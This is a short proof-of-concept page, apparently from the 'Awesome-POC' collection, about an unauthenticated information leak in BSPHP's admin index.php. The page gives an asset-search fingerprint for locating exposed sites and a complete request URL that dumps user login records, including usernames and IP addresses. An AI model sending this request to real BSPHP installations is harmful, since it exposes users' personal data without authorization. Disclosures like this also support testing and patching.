Awesome-POC/CMS漏洞/BSPHP index.php 未授权访问 信息泄露漏洞.md

27 lines
480 B
Markdown
Raw Normal View History

2022-02-20 16:14:31 +08:00
# BSPHP index.php 未授权访问 信息泄露漏洞
## 漏洞描述
BSPHP 存在未授权访问 泄露用户 IP 和 账户名信息
## 漏洞影响
```
BSPHP
```
2023-08-28 15:55:36 +08:00
## 网络测绘
2022-02-20 16:14:31 +08:00
```
"BSPHP"
```
## 漏洞复现
访问如下URL泄露用户名与登录IP
```plain
http://xxx.xxx.xxx.xxx/admin/index.php?m=admin&c=log&a=table_json&json=get&soso_ok=1&t=user_login_log&page=1&limit=10&bsphptime=1600407394176&soso_id=1&soso=&DESC=0
```
2022-12-05 11:09:28 +08:00
![](./images/202202162317323.png)